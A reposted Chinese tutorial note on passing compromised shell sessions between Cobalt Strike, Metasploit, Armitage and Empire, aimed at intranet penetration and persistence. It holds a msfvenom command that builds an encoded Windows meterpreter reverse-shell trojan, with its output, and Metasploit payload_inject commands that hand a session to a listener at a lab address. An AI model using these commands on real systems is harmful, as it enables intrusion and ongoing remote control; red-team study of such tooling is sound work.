碼上快樂

相關內容    簡體    繁體

cobalt strike筆記-CS與MSF,Armitage,Empire互轉shell

本文轉載自   查看原文   2019-09-14 18:27   940    內網滲透 內網安全 內網滲透技術/ 內網滲透&&域滲透/ 后門維持

 

 

 

0x01 Metasploit派生shell給Cobaltstrike

生成木馬:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Final size of exe file: 73802 bytes

 

 

 

msf派生給cs:

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.5.4
msf exploit(payload_inject) > set LPORT 4444
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

 

然后在cobaltstrike中創建一個windows/foreign/reverse_tcp Listener
,並根據metasploit監聽配置cobaltstrike的listener

 

 

 

 

 

cs派生給msf:

 

 

 

 

 

 

msf中開啟相應的監聽:

 
ps:
默認情況下,payload_inject執行之后會在本地產生一個新的handler,
由於我們已經有了一個,所以不需要在產生一個,所以這里我們設置
set DisablePayloadHandler true

如果出現錯誤,PID does not actually exist,可以設置一下注入進程的pid。set pid 進程號

 

 

 

0x02-Cobaltstrike與Armitage互轉shell

首先在armitage中配置一個handler

payload要與cobaltstrike的foreign監聽器選擇相同協議

 

 

 

Armitage派生shell給cobaltstrike

選擇armitage中的會話,右鍵,Access-->Pss Session

 

 

 

0x03-Cobaltstrike與Empire會話互轉

(Empire) > help

Commands
========
agents            Jump to the Agents menu.
creds             Add/display credentials to/from the database.
exit              Exit Empire
help              Displays the help menu.
list              Lists active agents or listeners.
listeners         Interact with active listeners.
reload            Reload one (or all) Empire modules.
reset             Reset a global option (e.g. IP whitelists).
searchmodule      Search Empire module names/descriptions.
set               Set a global option (e.g. IP whitelists).
show              Show a global option (e.g. IP whitelists).
usemodule         Use an Empire module.
usestager         Use an Empire stager.

 

 

 

 

cobaltstrike添加foreign監聽器,協議為http

 

 

 

 

empire收到會話

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 cs派生msf shell cobalt strike筆記-常用beacon掃盲 CS與msf的shell互相傳遞 Cobalt Strike使用教程一 Cobalt Strike插件 cobalt strike 插件開發 cobalt strike入門學習 Cobalt Strike修改特征 Cobalt Strike 3.13的新功能 Cobalt Strike 生成shellcode免殺
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM